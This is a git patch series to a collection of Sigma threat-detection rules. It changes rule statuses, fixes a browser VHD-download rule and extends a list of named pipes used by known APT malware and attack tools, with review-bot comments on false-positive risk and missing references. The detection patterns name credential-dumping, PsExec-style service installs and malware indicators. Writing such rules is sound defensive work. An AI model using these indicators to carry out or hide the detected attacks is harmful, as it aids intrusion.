@@ -4,7 +4,7 @@ related: - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 type: derived description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques -status: experimental +status: unsupported author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2021/09/21 diff --git a/rules-unsupported/net_dns_high_subdomain_rate.yml b/rules-unsupported/net_dns_high_subdomain_rate.yml index 9fe286d5..a7b0deaf 100644 --- a/rules-unsupported/net_dns_high_subdomain_rate.yml +++ b/rules-unsupported/net_dns_high_subdomain_rate.yml @@ -39,4 +39,4 @@ detection: falsepositives: - Legitimate domain name requested, which should be added to whitelist level: high -status: experimental +status: unsupported diff --git a/rules-unsupported/net_dns_large_domain_name.yml b/rules-unsupported/net_dns_large_domain_name.yml index afaf481d..308ad0e3 100644 --- a/rules-unsupported/net_dns_large_domain_name.yml +++ b/rules-unsupported/net_dns_large_domain_name.yml @@ -34,4 +34,4 @@ detection: falsepositives: - Legitimate domain name requested, which should be added to whitelist level: high -status: experimental \ No newline at end of file +status: unsupported \ No newline at end of file diff --git a/rules-unsupported/net_possible_dns_rebinding.yml b/rules-unsupported/net_possible_dns_rebinding.yml index 2da861a2..e52da4c6 100644 --- a/rules-unsupported/net_possible_dns_rebinding.yml +++ b/rules-unsupported/net_possible_dns_rebinding.yml @@ -1,6 +1,6 @@ title: Possible DNS Rebinding id: ec5b8711-b550-4879-9660-568aaae2c3ea -status: experimental +status: unsupported description: 'Detects DNS-answer with TTL <10.' date: 2019/10/25 author: Ilyas Ochkov, oscd.community diff --git a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml index 931cae2c..0fe996cd 100644 
--- a/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml +++ b/rules-unsupported/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml @@ -1,7 +1,7 @@ title: MSI Spawned Cmd and Powershell Spawned Processes id: 38cf8340-461b-4857-bf99-23a41f772b18 description: This rule will looks for Windows Installer service (msiexec.exe) spawned command line and/or powershell that spawned other processes -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 references: diff --git a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml index 07ca9c1a..955ce84c 100644 --- a/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml +++ b/rules-unsupported/sysmon_always_install_elevated_parent_child_correlated.yml @@ -3,7 +3,7 @@ id: 078235c5-6ec5-48e7-94b2-f8b5474379ea description: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege #look for MSI start by low privilege user, write the process guid to the suspicious_guid variable #look for child process from the suspicious_guid, alert if it's Windows Installer trying to install package with SYSTEM privilege -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community date: 2020/10/13 references: diff --git a/rules-unsupported/sysmon_process_reimaging.yml b/rules-unsupported/sysmon_process_reimaging.yml index 3da02214..3caa875e 100644 --- a/rules-unsupported/sysmon_process_reimaging.yml +++ b/rules-unsupported/sysmon_process_reimaging.yml 
@@ -11,7 +11,7 @@ description: Detects process reimaging defense evasion technique # Rule must trigger if selection1 and selection2 both occurs in timeframe of 120 sec. # Rule logic is currently not supported by SIGMA. # Sysmon v.10.0 or newer is required for proper detection. -status: experimental +status: unsupported author: Alexey Balandin, oscd.community references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/ diff --git a/rules-unsupported/win_access_fake_files_with_stored_credentials.yml b/rules-unsupported/win_access_fake_files_with_stored_credentials.yml index c8f95ed7..40485658 100644 --- a/rules-unsupported/win_access_fake_files_with_stored_credentials.yml +++ b/rules-unsupported/win_access_fake_files_with_stored_credentials.yml @@ -1,7 +1,7 @@ title: Stored Credentials in Fake Files id: 692b979c-f747-41dc-ad72-1f11c01b110e description: Search for accessing of fake files with stored credentials -status: experimental +status: unsupported author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community date: 2020/10/05 references: diff --git a/rules-unsupported/win_apt_apt29_tor.yml b/rules-unsupported/win_apt_apt29_tor.yml index 60622027..83e2fa41 100644 --- a/rules-unsupported/win_apt_apt29_tor.yml +++ b/rules-unsupported/win_apt_apt29_tor.yml @@ -11,7 +11,8 @@ tags: - attack.t1543.003 date: 2017/11/01 modified: 2020/08/23 -author: Thomas Patzke +author: Thomas Patzke +status: unsupported logsource: product: windows service: system diff --git a/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml b/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml index 89358fe1..6e8edac1 100644 --- a/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml +++ b/rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml 
@@ -31,4 +31,4 @@ detection:
 falsepositives:
 - Legitimate administrator adding new domain controller to already existing domain
 level: medium
-status: experimental
+status: unsupported
diff --git a/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml b/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml
index 8ace6381..88459889 100644
--- a/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml
+++ b/rules-unsupported/win_dumping_ntdsdit_via_netsync.yml
@@ -27,4 +27,4 @@ detection:
 falsepositives:
 - Legitimate administrator adding new domain controller to already existing domain
 level: medium
-status: experimental
+status: unsupported
diff --git a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
index cd2ce7d8..d31c5a55 100644
--- a/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
+++ b/rules-unsupported/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
@@ -6,7 +6,7 @@ references:
 tags:
 - attack.privilege_escalation
 - attack.t1068
-status: experimental
+status: unsupported
 author: Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule)
 date: 2019/06/03
 logsource:
diff --git a/rules-unsupported/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml
index 5afed9f9..7e53f75b 100644
--- a/rules-unsupported/win_mal_service_installs.yml
+++ b/rules-unsupported/win_mal_service_installs.yml
@@ -34,4 +34,5 @@ detection:
 condition: selection and 1 of malsvc_*
 falsepositives:
 - Penetration testing
-level: critical
\ No newline at end of file
+level: critical
+status: unsupported
\ No newline at end of file
diff --git a/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
index 2c386e11..3461d755 100644
--- a/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
+++ b/rules-unsupported/win_metasploit_or_impacket_smb_psexec_service_install.yml
@@ -34,4 +34,5 @@ fields:
 - ServiceFileName
 falsepositives:
 - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name
-level: high
\ No newline at end of file
+level: high
+status: unsupported
\ No newline at end of file
diff --git a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml
index 94c1560f..e23e9749 100644
--- a/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml
+++ b/rules-unsupported/win_possible_privilege_escalation_using_rotten_potato.yml
@@ -8,7 +8,7 @@ tags:
 - attack.privilege_escalation
 - attack.t1134 # an old one
 - attack.t1134.002
-status: experimental
+status: unsupported
 author: Teymur Kheirkhabarov
 date: 2019/10/26
 modified: 2020/09/01
diff --git a/rules-unsupported/win_remote_schtask.yml b/rules-unsupported/win_remote_schtask.yml
index 5730b930..8a75470a 100644
--- a/rules-unsupported/win_remote_schtask.yml
+++ b/rules-unsupported/win_remote_schtask.yml
@@ -1,6 +1,6 @@
 title: Remote Schtasks Creation
 id: cf349c4b-99af-40fa-a051-823aa2307a84
-status: experimental
+status: unsupported
 description: Detects remote execution via scheduled task creation or update on the destination host
 author: Jai Minton, oscd.community
 date: 2020/10/05
diff --git a/rules-unsupported/win_remote_service.yml b/rules-unsupported/win_remote_service.yml
index 75654260..3a8f351e 100644
--- a/rules-unsupported/win_remote_service.yml
+++ b/rules-unsupported/win_remote_service.yml
@@ -1,7 +1,7 @@
 action: global
 title: Remote Service Creation
 id: 4a3a2b96-d7fc-4cb9-80e4-4a545fe95f46
-status: experimental
+status: unsupported
 description: Detects remote execution via service creation on the destination host
 author: Jai Minton, oscd.community
 date: 2020/10/05
From ef0f836a7123dddcadfa8ddc61ed614420916d5a Mon Sep 17 00:00:00 2001
From: frack113
Date: Fri, 29 Oct 2021 08:21:41 +0200
Subject: [PATCH 1362/1367] Fix detection
---
 rules/windows/file_event/file_event_mal_vhd_download.yml | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/rules/windows/file_event/file_event_mal_vhd_download.yml b/rules/windows/file_event/file_event_mal_vhd_download.yml
index ec4aa319..25a34387 100644
--- a/rules/windows/file_event/file_event_mal_vhd_download.yml
+++ b/rules/windows/file_event/file_event_mal_vhd_download.yml
@@ -1,6 +1,6 @@
 title: Suspicious VHD Image Download From Browser
 id: 8468111a-ef07-4654-903b-b863a80bbc95
-status: experimental
+status: test
 description: Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls
 references:
 - https://redcanary.com/blog/intelligence-insights-october-2021/
@@ -8,6 +8,7 @@ references:
 - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
 author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
 date: 2021/10/25
+modified: 2021/10/29
 tags:
 - attack.resource_development
 - attack.t1587.001
@@ -17,7 +18,7 @@ logsource:
 definition: in sysmon add ".vhd "
 detection:
 selection:
- - Image|endswith:
+ Image|endswith:
 - chrome.exe
 - firefox.exe
 - microsoftedge.exe
@@ -26,7 +27,7 @@ detection:
 - iexplorer.exe
 - brave.exe
 - opera.exe
- - TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier
+ TargetFilename|contains: '.vhd' #not endswith to get the alternate data stream log Too TargetFilename: C:\Users\Frack113\Downloads\windows.vhd:Zone.Identifier
 condition: selection
 falsepositives:
 - Legitimate user creation
From 4b18d5e45c3139a07d7451773859489524a6ed1f Mon Sep 17 00:00:00 2001
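Review bot: The `- iexplorer.exe` entry in the `Image|endswith` list (a context line of the `@@ -26,7 +27,7 @@` hunk) can never match Internet Explorer, whose image name is `iexplore.exe`; the stray `r` means the rule silently never covers IE downloads, so change it to `- iexplore.exe`. Merging the two list items into a single map is the right fix, since a list of maps in a Sigma selection is ORed and the old form matched every file a browser wrote. `TargetFilename|contains: '.vhd'` also matches `.vhdx` and any path whose directory name contains `.vhd`; if that widening is intended, say so in the comment, e.g. `#contains, not endswith: also covers .vhdx and the Zone.Identifier ADS`. The `selection` map begins in the previous hunk.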
From: phantinuss
Date: Fri, 29 Oct 2021 09:57:19 +0200
Subject: [PATCH 1363/1367] chore: set status to test
---
 rules/windows/file_event/sysmon_creation_system_file.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/file_event/sysmon_creation_system_file.yml b/rules/windows/file_event/sysmon_creation_system_file.yml
index 00933d3c..bc5be145 100755
--- a/rules/windows/file_event/sysmon_creation_system_file.yml
+++ b/rules/windows/file_event/sysmon_creation_system_file.yml
@@ -1,6 +1,6 @@
 title: File Created with System Process Name
 id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d
-status: experimental
+status: test
 description: Detects the creation of an executable with a system process name in a suspicious folder
 author: Sander Wiebing
 date: 2020/05/26
From 8c57d29561d8add581d61950831f8de59cb420a8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?David=20Andr=C3=A9?=
Date: Fri, 29 Oct 2021 15:49:04 +0200
Subject: [PATCH 1364/1367] Added turla hyperstack named pipe
---
 rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
index 835c6fde..1ed7781b 100644
--- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
+++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
@@ -5,7 +5,7 @@ description: Detects the creation of a named pipe used by known APT malware
 references:
 - Various sources
 date: 2017/11/06
-author: Florian Roth, blueteam0ps
+author: Florian Roth, blueteam0ps, elhoim
 logsource:
 product: windows
 category: pipe_created
@@ -35,6 +35,7 @@ detection:
 - '\jaccdpqnvbrrxlaf' #PoshC2 default
 - '\csexecsvc' #CSEXEC default
 - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake
+ - 'adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
 condition: selection
 tags:
 - attack.defense_evasion
From 0de88e2f30ed940c50b9c012c4df7228b99bf9a4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?David=20Andr=C3=A9?=
Date: Fri, 29 Oct 2021 16:33:07 +0200
Subject: [PATCH 1365/1367] Added four other named pipes and corrected one missing slash
---
 rules/windows/pipe_created/sysmon_mal_namedpipes.yml | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)
diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
index 1ed7781b..5eb24be4 100644
--- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
+++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
@@ -35,7 +35,11 @@ detection:
 - '\jaccdpqnvbrrxlaf' #PoshC2 default
 - '\csexecsvc' #CSEXEC default
 - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake
- - 'adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
+ - '\adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
+ - '\AnonymousPipe' # Hidden Cobra Hoplight - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
+ - '\bc367' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
+ - '\bc31a7' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
+ - '\testPipe' # Emissary Panda Hyerbri - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
 condition: selection
 tags:
 - attack.defense_evasion
From eba2f3b68fd5ef9fd066c468dd474ca3a3827f4b Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sat, 30 Oct 2021 17:28:07 +0200
Subject: [PATCH 1366/1367] add temp folder
---
 .../windows/registry_event/sysmon_susp_run_key_img_folder.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml b/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml
index af430e49..1bbe17ae 100755
--- a/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml
+++ b/rules/windows/registry_event/sysmon_susp_run_key_img_folder.yml
@@ -10,7 +10,7 @@ tags:
 - attack.t1060 # an old one
 - attack.t1547.001
 date: 2018/08/25
-modified: 2020/09/06
+modified: 2021/10/30
 logsource:
 category: registry_event
 product: windows
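Review bot: `'\testPipe'` and `'\AnonymousPipe'` are generic, human-readable names that legitimate software or developer test code could plausibly create, unlike the random-looking pipe names elsewhere in this list, so they carry a noticeably higher false-positive risk in a rule that alerts on the pipe name alone; either document that exposure under `falsepositives` or pair them with a second indicator from the cited reports. The Unit 42 article cited for `\testPipe` describes the HyperBro implant, so `# Emissary Panda Hyerbri` appears to be a typo for `# Emissary Panda HyperBro`. The `PipeName` list and the `selection` map start outside this hunk.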
@@ -27,6 +27,7 @@ detection:
 - 'C:\Users\Public\'
 - 'C:\Users\Default\'
 - 'C:\Users\Desktop\'
+ - '\AppData\Local\Temp\'
 - Details|startswith:
 - '%Public%\'
 - 'wscript'
From 9f7d4a832ed7a56fff638ce136251b90f7af9372 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Sun, 31 Oct 2021 07:03:27 +0100
Subject: [PATCH 1367/1367] Update sysmon_mal_namedpipes.yml
---
 .../pipe_created/sysmon_mal_namedpipes.yml | 59 +++++++++++--------
 1 file changed, 35 insertions(+), 24 deletions(-)
diff --git a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
index 5eb24be4..b6b948ec 100644
--- a/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
+++ b/rules/windows/pipe_created/sysmon_mal_namedpipes.yml
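Review bot: The new `'\AppData\Local\Temp\'` entry is a relative path fragment while its siblings are absolute `C:\Users\...` prefixes, so whether it can ever match depends on the modifier of the enclosing field, which starts outside this hunk: under `|contains` it works, but under `|startswith` (the form the neighbouring `- Details|startswith:` map uses) it never matches, because a Run-key value begins with a drive letter or a quote. Please confirm the enclosing modifier is `contains`, or anchor the entry with a wildcard such as `'C:\Users\*\AppData\Local\Temp\'` if the target backends support mid-string wildcards. A short comment like `# per-user temp dir; relative on purpose, needs |contains` would keep the next editor from "fixing" it into an absolute path that breaks the match.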
@@ -3,8 +3,19 @@ id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
 status: experimental
 description: Detects the creation of a named pipe used by known APT malware
 references:
- - Various sources
+ - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
+ - https://securelist.com/faq-the-projectsauron-apt/75533/
+ - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
+ - https://www.us-cert.gov/ncas/alerts/TA17-117A
+ - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
+ - https://thedfirreport.com/2020/06/21/snatch-ransomware/
+ - https://github.com/RiccardoAncarani/LiquidSnake
+ - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
+ - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
+ - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
+ - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
 date: 2017/11/06
+modified: 2021/10/30
 author: Florian Roth, blueteam0ps, elhoim
 logsource:
 product: windows
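Review bot: The expanded `references` list still leaves several indicators without any source: nothing points to evidence for the Uroburos (`\isapi_*`), Cobra (`\sdlrpc`), Sofacy (`\ahexec`), Covenant (`\gruntsvc`), PoshC2, CSEXEC and CrackMapExec pipe names, and the Equation Group sample hash `77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0` that justified `\pcheap_reuse` is removed from its comment in the next hunk without an equivalent reference here. An analyst triaging a hit on one of those pipes therefore has no way to validate the indicator or judge its age. Add one reference line per remaining source (a vendor report or, failing that, the sample hash itself, e.g. `- 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0 (Equation Group sample, \pcheap_reuse)`), so the list in the following hunk can stay free of URLs without losing provenance.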
@@ -13,33 +24,33 @@ logsource:
 detection:
 selection:
 PipeName:
- - '\isapi_http' # Uroburos Malware Named Pipe
- - '\isapi_dg' # Uroburos Malware Named Pipe
- - '\isapi_dg2' # Uroburos Malware Named Pipe
- - '\sdlrpc' # Cobra Trojan Named Pipe http://goo.gl/8rOZUX
+ - '\isapi_http' # Uroburos Malware
+ - '\isapi_dg' # Uroburos Malware
+ - '\isapi_dg2' # Uroburos Malware
+ - '\sdlrpc' # Cobra Trojan
 - '\ahexec' # Sofacy group malware
- - '\winsession' # Wild Neutron APT malware https://goo.gl/pivRZJ
- - '\lsassw' # Wild Neutron APT malware https://goo.gl/pivRZJ
- - '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron https://goo.gl/eFoP4A
- - '\9f81f59bc58452127884ce513865ed20' # Project Sauron https://goo.gl/eFoP4A
- - '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron https://goo.gl/eFoP4A
- - '\rpchlp_3' # Project Sauron https://goo.gl/eFoP4A - Technical Analysis Input
- - '\NamePipe_MoreWindows' # Cloud Hopper Annex B https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, US-CERT Alert - RedLeaves https://www.us-cert.gov/ncas/alerts/TA17-117A
- - '\pcheap_reuse' # Pipe used by Equation Group malware 77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0
- - '\gruntsvc' # Covenant default named pipe
- # - '\status_*' # CS default named pipes https://github.com/Neo23x0/sigma/issues/253
- - '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware report https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
- - '\bizkaz' # Snatch Ransomware https://thedfirreport.com/2020/06/21/snatch-ransomware/
- - '\svcctl' #Crackmapexec smbexec default named pipe
+ - '\winsession' # Wild Neutron APT malware
+ - '\lsassw' # Wild Neutron APT malware
+ - '\46a676ab7f179e511e30dd2dc41bd388' # Project Sauron
+ - '\9f81f59bc58452127884ce513865ed20' # Project Sauron
+ - '\e710f28d59aa529d6792ca6ff0ca1b34' # Project Sauron
+ - '\rpchlp_3' # Project Sauron
+ - '\NamePipe_MoreWindows' # Cloud Hopper - RedLeaves
+ - '\pcheap_reuse' # Pipe used by Equation Group malware
+ - '\gruntsvc' # Covenant default
+ # - '\status_*' # CS default https://github.com/Neo23x0/sigma/issues/253
+ - '\583da945-62af-10e8-4902-a8f205c72b2e' # SolarWinds SUNBURST malware
+ - '\bizkaz' # Snatch Ransomware
+ - '\svcctl' #Crackmapexec smbexec default
 - '\Posh*' #PoshC2 default
 - '\jaccdpqnvbrrxlaf' #PoshC2 default
 - '\csexecsvc' #CSEXEC default
- - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake https://github.com/RiccardoAncarani/LiquidSnake
- - '\adschemerpc' # Turla HyperStack - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
- - '\AnonymousPipe' # Hidden Cobra Hoplight - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
- - '\bc367' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
- - '\bc31a7' # Pacifier - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
- - '\testPipe' # Emissary Panda Hyerbri - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
+ - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' # LiquidSnake
+ - '\adschemerpc' # Turla HyperStack
+ - '\AnonymousPipe' # Hidden Cobra Hoplight
+ - '\bc367' # Pacifier
+ - '\bc31a7' # Pacifier
+ - '\testPipe' # Emissary Panda Hyerbri
 condition: selection
 tags:
 - attack.defense_evasion
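Review bot: `'\svcctl'` is the well-known RPC endpoint pipe of the Windows Service Control Manager (MS-SCMR), not a pipe specific to CrackMapExec, so the rewritten comment `#Crackmapexec smbexec default` understates what this entry matches: every client that manages services remotely — `sc.exe \\host`, `services.msc`, PsExec-style admin tools, configuration-management agents — talks to the same pipe, and depending on how `pipe_created` is mapped for your Sysmon config (event 17 only, or 17 and 18) this one entry can fire on routine administration while the rest of the list is malware-specific. Either split `\svcctl` into its own lower-severity rule, or keep it here but record the exposure in `falsepositives` and widen the comment to `#Crackmapexec smbexec default - also the legitimate SCM RPC endpoint, noisy on admin hosts`. The shortened comments elsewhere in the hunk are fine only if the dropped URLs and the Equation Group sample hash survive in `references`; as written, `\pcheap_reuse` no longer has any source at all.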